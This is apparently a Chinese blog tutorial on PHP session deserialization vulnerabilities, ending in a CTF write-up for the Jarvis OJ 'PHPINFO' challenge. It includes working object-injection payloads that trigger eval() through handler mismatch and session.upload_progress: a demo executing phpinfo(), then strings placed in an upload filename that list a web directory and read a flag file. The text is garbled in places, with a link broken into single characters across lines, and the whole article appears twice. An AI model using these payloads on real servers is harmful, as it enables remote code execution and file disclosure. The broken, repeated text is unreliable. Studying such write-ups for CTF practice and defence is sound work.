PHP session反序列化漏洞
PHP session 反序列化漏洞,就是当【序列化存储Session 数据】与【反序列化读取Session 数据】的方式不同导致session 反序列化漏洞的产生
什么是session
官方Session 定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点:
session 保存的位置是在服务器端session 通常是要配合cookie 使用
因为HTTP的无状态性,服务端产生了session 来标识当前的用户状态
本质上,session 就是一种可以维持服务器端的数据存储技术。即**session 技术就是一种基于后端有别于数据库的临时存储数据的技术**
PHP session工作流程
以PHP为例,理解session 的原理
- PHP脚本使用 session_start()时开启
session 会话,会自动检测PHPSESSID
- 如果
Cookie 中存在,获取PHPSESSID - 如果
Cookie 中不存在,创建一个PHPSESSID ,并通过响应头以Cookie 形式保存到浏览器 - 初始化超全局变量
$_SESSION 为一个空数组 - PHP通过
PHPSESSID 去指定位置(PHPSESSID 文件存储位置)匹配对应的文件
- 存在该文件:读取文件内容(通过反序列化方式),将数据存储到
$_SESSION 中 - 不存在该文件: session_start()创建一个
PHPSESSID 命名文件 - 程序执行结束,将
$_SESSION 中保存的所有数据序列化存储到PHPSESSID 对应的文件中
具体原理图:

php.ini session配置
php.ini 里面有较重要的session 配置项
session.save_path="/tmp" --设置session文件的存储位置
session.save_handler=files --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start= 0 --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用php
session.upload_progress.enabled= On --启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup= oN --读取所有POST数据(即完成上传)后立即清理进度信息,默认启用
PHP session序列化机制
根据php.ini 中的配置项,我们研究将$_SESSION 中保存的所有数据序列化存储到PHPSESSID 对应的文件中,使用的三种不同的处理格式,即session.serialize_handler 定义的三种引擎:
处理器 | 对应的存储格式 |
---|
php | 键名 + 竖线 + 经过 serialize() 函数反序列处理的值 | php_binary | 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值 | php_serialize (php>=5.5.4) | 经过 serialize() 函数反序列处理的数组 |
php处理器
首先来看看默认session.serialize_handler = php 时候的序列化结果,代码如下
<?php
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>

为了方便查看,将session 存储目录设置为session.save_path = "/www/php_session" ,PHPSESSID 文件如下

1、文件名
文件名为sess_mpnnbont606f50eb178na451od ,其中mpnnbont606f50eb178na451od 就是后续请求头中Cookie 携带的PHPSESSID 的值 (如上图浏览器中已存储)
2、文件内容
php处理器存储格式
键名 | 竖线 | 经过 serialize() 函数反序列处理的值 |
---|
$_SESSION[‘name’]的键名:name | | | s:6:“harden”; |
php_binary处理器
使用php_binary处理器,即session.serialize_handler = php_binary
<?php
ini_set('session.serialize_handler','php_binary');
session_start();
$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];
echo $_SESSION['namenamenamenamenamenamenamenamename'];
?>
由于三种方式PHPSESSID 文件名都是一样的,这里只需要查看文件内容

键名的长度对应的 ASCII 字符 | 键名 | 经过 serialize() 函数反序列处理的值. |
---|
$ | namenamenamenamenamenamenamenamename | s:6:“harden”; |
php_serialize 处理器
使用php_binary处理器,即session.serialize_handler = php_serialize
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>
文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:"name";s:6:"harden";}

session的反序列化漏洞利用
session的反序列化漏洞,就是利用php 处理器和php_serialize 处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
漏洞成因
首先创建session.php ,使用php_serialize 处理器来存储session数据
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
echo $_SESSION['session'];
?>
test.php ,使用默认php 处理器来存储session数据
<?php
session_start();
class f4ke{
public $name;
function __wakeup(){
echo "Who are you?";
}
function __destruct(){
eval($this->name);
}
}
$str = new f4ke();
?>
接着,我们构建URL进行访问session.php :
http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

打开PHPSESSID 文件可看到序列化存储的内容
a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

漏洞分析:
在session.php 程序执行,我们将|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";} 通过php_serialize 处理器序列化保存成PHPSESSID 文件;
由于浏览器中保存的PHPSESSID 文件名不变,当我们访问test.php ,session_start(); 找到PHPSESSID 文件并使用php 处理器反序列化文件内容,识别格式即
键名 | 竖线 | 经过 serialize() 函数反序列处理的值 |
---|
a:1:{s:7:“session”;s:45:" | | | O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;} |
php处理器会以|作为分隔符,将O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";} 反序列化,就会触发__wakeup() 方法,最后对象销毁执行__destruct() 方法中的eval() 函数,相当于执行如下:
$_SESSION['session'] = new f4ke();
$_SESSION['session']->name = 'phpinfo();';
我们访问test.php ,即可直接执行phpinfo() 函数

CTF例题:PHPINFO
题目地址:http://web.jarvisoj.com:32784/index.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
我们可以看到ini_set('session.serialize_handler', 'php') ,判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo 参数新建对象触发魔术方法执行phpinfo() 函数,进一步查看session.serialize_handler 配置

可见php.ini 中session.serialize_handler = php_serialize ,当前目录中被设置为session.serialize_handler = php ,因此存在session反序列化利用的条件
补充知识
phpinfo文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):php
master value(主变量:php.ini里面的内容):php_serialize
那么我们如何找到代码入口将利用代码写入到session 文件?想要写入session 文件就得想办法在$_SESSION 变量中增加我们可控的输入点
补充知识
Session 上传进度 (此特性自 PHP 5.4.0 后可用)
当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态
当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name 同名变量时,上传进度可以在[
S
E
S
S
I
O
N
]
(
h
t
t
p
s
:
/
/
w
w
w
.
p
h
p
.
n
e
t
/
m
a
n
u
a
l
/
z
h
/
r
e
s
e
r
v
e
d
.
v
a
r
i
a
b
l
e
s
.
s
e
s
s
i
o
n
.
p
h
p
)
中
获
得
。
当
P
H
P
检
测
到
这
种
P
O
S
T
请
求
时
,
它
会
在
‘
_SESSION](https://www.php.net/manual/zh/reserved.variables.session.php)中获得。 当PHP检测到这种POST请求时,它会在`
S?ESSION](https://www.php.net/manual/zh/reserved.variables.session.php)中获得。当PHP检测到这种POST请求时,它会在‘_SESSION`中添加一组数据, 索引是 session.upload_progress.prefix 与 session.upload_progress.name连接在一起的值。
翻译成人话就是,当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST 一个与php.ini 中设置的session.upload_progress.name 同名变量PHP_SESSION_UPLOAD_PROGRESS ,如下图,即可写入$_SESSION ,进一步序列化写入session 文件

下面是官方给出的一个文件上传时监测进度例子:
<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" />
<input type="file" name="file1" />
<input type="file" name="file2" />
<input type="submit" />
</form>
其中name="" 也可以设置为name="PHP_SESSION_UPLOAD_PROGRESS"
在session中存储的上传进度,如下所示:
<?php
$_SESSION["upload_progress_123"] = array(
"start_time" => 1234567890,
"content_length" => 57343257,
"bytes_processed" => 453489,
"done" => false,
"files" => array(
0 => array(
"field_name" => "file1",
"name" => "foo.avi",
"tmp_name" => "/tmp/phpxxxxxx",
"error" => 0,
"done" => true,
"start_time" => 1234567890,
"bytes_processed" => 57343250,
),
1 => array(
"field_name" => "file2",
"name" => "bar.avi",
"tmp_name" => NULL,
"error" => 0,
"done" => false,
"start_time" => 1234567899,
"bytes_processed" => 54554,
),
)
);
其中,session中的field_name 和name 都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,http://web.jarvisoj.com:32784/index.php?phpinfo 查询设置

session.upload_progress.enabled = On --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup = Off --表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)
即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name 来将利用代码写入session 文件
构造POST 表单提交上传文件
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>
构造序列化字符串作为payload (利用代码)
<?php
class OowoO
{
public $mdzz='print_r(scandir(dirname(__FILE__)));';
}
$obj = new OowoO();
echo serialize($obj);
?>
为了防止" 被转义,我们在payload 中加入\
随意选择文件,点击表单提交,使用抓包工具burpsuite 抓取请求包

并修改filename 值为
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
发送请求包,代码执行过程分析:

因此直接执行print_r(scandir(dirname(__FILE__))); 并返回

phpinfo 查看当前目录,/opt/lampp/htdocs/

构造最终payload 读取Here_1s_7he_fl4g_buT_You_Cannot_see.php 文件内容,即flag
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

参考
https://xz.aliyun.com/t/6753
https://www.mi1k7ea.com/2019/04/21/PHP-session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/# PHP session反序列化漏洞
PHP session 反序列化漏洞,就是当【序列化存储Session 数据】与【反序列化读取Session 数据】的方式不同导致session 反序列化漏洞的产生
什么是session
官方Session 定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点:
session 保存的位置是在服务器端session 通常是要配合cookie 使用
因为HTTP的无状态性,服务端产生了session 来标识当前的用户状态
本质上,session 就是一种可以维持服务器端的数据存储技术。即**session 技术就是一种基于后端有别于数据库的临时存储数据的技术**
PHP session工作流程
以PHP为例,理解session 的原理
- PHP脚本使用 session_start()时开启
session 会话,会自动检测PHPSESSID
- 如果
Cookie 中存在,获取PHPSESSID - 如果
Cookie 中不存在,创建一个PHPSESSID ,并通过响应头以Cookie 形式保存到浏览器 - 初始化超全局变量
$_SESSION 为一个空数组 - PHP通过
PHPSESSID 去指定位置(PHPSESSID 文件存储位置)匹配对应的文件
- 存在该文件:读取文件内容(通过反序列化方式),将数据存储到
$_SESSION 中 - 不存在该文件: session_start()创建一个
PHPSESSID 命名文件 - 程序执行结束,将
$_SESSION 中保存的所有数据序列化存储到PHPSESSID 对应的文件中
具体原理图:

php.ini session配置
php.ini 里面有较重要的session 配置项
session.save_path="/tmp" --设置session文件的存储位置
session.save_handler=files --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start= 0 --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用php
session.upload_progress.enabled= On --启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup= oN --读取所有POST数据(即完成上传)后立即清理进度信息,默认启用
PHP session序列化机制
根据php.ini 中的配置项,我们研究将$_SESSION 中保存的所有数据序列化存储到PHPSESSID 对应的文件中,使用的三种不同的处理格式,即session.serialize_handler 定义的三种引擎:
处理器 | 对应的存储格式 |
---|
php | 键名 + 竖线 + 经过 serialize() 函数反序列处理的值 | php_binary | 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值 | php_serialize (php>=5.5.4) | 经过 serialize() 函数反序列处理的数组 |
php处理器
首先来看看默认session.serialize_handler = php 时候的序列化结果,代码如下
<?php
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>

为了方便查看,将session 存储目录设置为session.save_path = "/www/php_session" ,PHPSESSID 文件如下

1、文件名
文件名为sess_mpnnbont606f50eb178na451od ,其中mpnnbont606f50eb178na451od 就是后续请求头中Cookie 携带的PHPSESSID 的值 (如上图浏览器中已存储)
2、文件内容
php处理器存储格式
键名 | 竖线 | 经过 serialize() 函数反序列处理的值 |
---|
$_SESSION[‘name’]的键名:name | | | s:6:“harden”; |
php_binary处理器
使用php_binary处理器,即session.serialize_handler = php_binary
<?php
ini_set('session.serialize_handler','php_binary');
session_start();
$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];
echo $_SESSION['namenamenamenamenamenamenamenamename'];
?>
由于三种方式PHPSESSID 文件名都是一样的,这里只需要查看文件内容

键名的长度对应的 ASCII 字符 | 键名 | 经过 serialize() 函数反序列处理的值. |
---|
$ | namenamenamenamenamenamenamenamename | s:6:“harden”; |
php_serialize 处理器
使用php_binary处理器,即session.serialize_handler = php_serialize
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>
文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:"name";s:6:"harden";}

session的反序列化漏洞利用
session的反序列化漏洞,就是利用php 处理器和php_serialize 处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
漏洞成因
首先创建session.php ,使用php_serialize 处理器来存储session数据
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
echo $_SESSION['session'];
?>
test.php ,使用默认php 处理器来存储session数据
<?php
session_start();
class f4ke{
public $name;
function __wakeup(){
echo "Who are you?";
}
function __destruct(){
eval($this->name);
}
}
$str = new f4ke();
?>
接着,我们构建URL进行访问session.php :
http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

打开PHPSESSID 文件可看到序列化存储的内容
a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

漏洞分析:
在session.php 程序执行,我们将|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";} 通过php_serialize 处理器序列化保存成PHPSESSID 文件;
由于浏览器中保存的PHPSESSID 文件名不变,当我们访问test.php ,session_start(); 找到PHPSESSID 文件并使用php 处理器反序列化文件内容,识别格式即
键名 | 竖线 | 经过 serialize() 函数反序列处理的值 |
---|
a:1:{s:7:“session”;s:45:" | | | O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;} |
php处理器会以|作为分隔符,将O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";} 反序列化,就会触发__wakeup() 方法,最后对象销毁执行__destruct() 方法中的eval() 函数,相当于执行如下:
$_SESSION['session'] = new f4ke();
$_SESSION['session']->name = 'phpinfo();';
我们访问test.php ,即可直接执行phpinfo() 函数

CTF例题:PHPINFO
题目地址:http://web.jarvisoj.com:32784/index.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
我们可以看到ini_set('session.serialize_handler', 'php') ,判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo 参数新建对象触发魔术方法执行phpinfo() 函数,进一步查看session.serialize_handler 配置

可见php.ini 中session.serialize_handler = php_serialize ,当前目录中被设置为session.serialize_handler = php ,因此存在session反序列化利用的条件
补充知识
phpinfo文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):php
master value(主变量:php.ini里面的内容):php_serialize
那么我们如何找到代码入口将利用代码写入到session 文件?想要写入session 文件就得想办法在$_SESSION 变量中增加我们可控的输入点
补充知识
Session 上传进度 (此特性自 PHP 5.4.0 后可用)
当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态
当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name 同名变量时,上传进度可以在[
S
E
S
S
I
O
N
]
(
h
t
t
p
s
:
/
/
w
w
w
.
p
h
p
.
n
e
t
/
m
a
n
u
a
l
/
z
h
/
r
e
s
e
r
v
e
d
.
v
a
r
i
a
b
l
e
s
.
s
e
s
s
i
o
n
.
p
h
p
)
中
获
得
。
当
P
H
P
检
测
到
这
种
P
O
S
T
请
求
时
,
它
会
在
‘
_SESSION](https://www.php.net/manual/zh/reserved.variables.session.php)中获得。 当PHP检测到这种POST请求时,它会在`
S?ESSION](https://www.php.net/manual/zh/reserved.variables.session.php)中获得。当PHP检测到这种POST请求时,它会在‘_SESSION`中添加一组数据, 索引是 session.upload_progress.prefix 与 session.upload_progress.name连接在一起的值。
翻译成人话就是,当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST 一个与php.ini 中设置的session.upload_progress.name 同名变量PHP_SESSION_UPLOAD_PROGRESS ,如下图,即可写入$_SESSION ,进一步序列化写入session 文件

下面是官方给出的一个文件上传时监测进度例子:
<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" />
<input type="file" name="file1" />
<input type="file" name="file2" />
<input type="submit" />
</form>
其中name="" 也可以设置为name="PHP_SESSION_UPLOAD_PROGRESS"
在session中存储的上传进度,如下所示:
<?php
$_SESSION["upload_progress_123"] = array(
"start_time" => 1234567890,
"content_length" => 57343257,
"bytes_processed" => 453489,
"done" => false,
"files" => array(
0 => array(
"field_name" => "file1",
"name" => "foo.avi",
"tmp_name" => "/tmp/phpxxxxxx",
"error" => 0,
"done" => true,
"start_time" => 1234567890,
"bytes_processed" => 57343250,
),
1 => array(
"field_name" => "file2",
"name" => "bar.avi",
"tmp_name" => NULL,
"error" => 0,
"done" => false,
"start_time" => 1234567899,
"bytes_processed" => 54554,
),
)
);
其中,session中的field_name 和name 都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,http://web.jarvisoj.com:32784/index.php?phpinfo 查询设置

session.upload_progress.enabled = On --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup = Off --表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)
即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name 来将利用代码写入session 文件
构造POST 表单提交上传文件
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>
构造序列化字符串作为payload (利用代码)
<?php
class OowoO
{
public $mdzz='print_r(scandir(dirname(__FILE__)));';
}
$obj = new OowoO();
echo serialize($obj);
?>
为了防止" 被转义,我们在payload 中加入\
随意选择文件,点击表单提交,使用抓包工具burpsuite 抓取请求包

并修改filename 值为
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
发送请求包,代码执行过程分析:

因此直接执行print_r(scandir(dirname(__FILE__))); 并返回

phpinfo 查看当前目录,/opt/lampp/htdocs/

构造最终payload 读取Here_1s_7he_fl4g_buT_You_Cannot_see.php 文件内容,即flag
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

参考
https://xz.aliyun.com/t/6753
https://www.mi1k7ea.com/2019/04/21/PHP-session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
|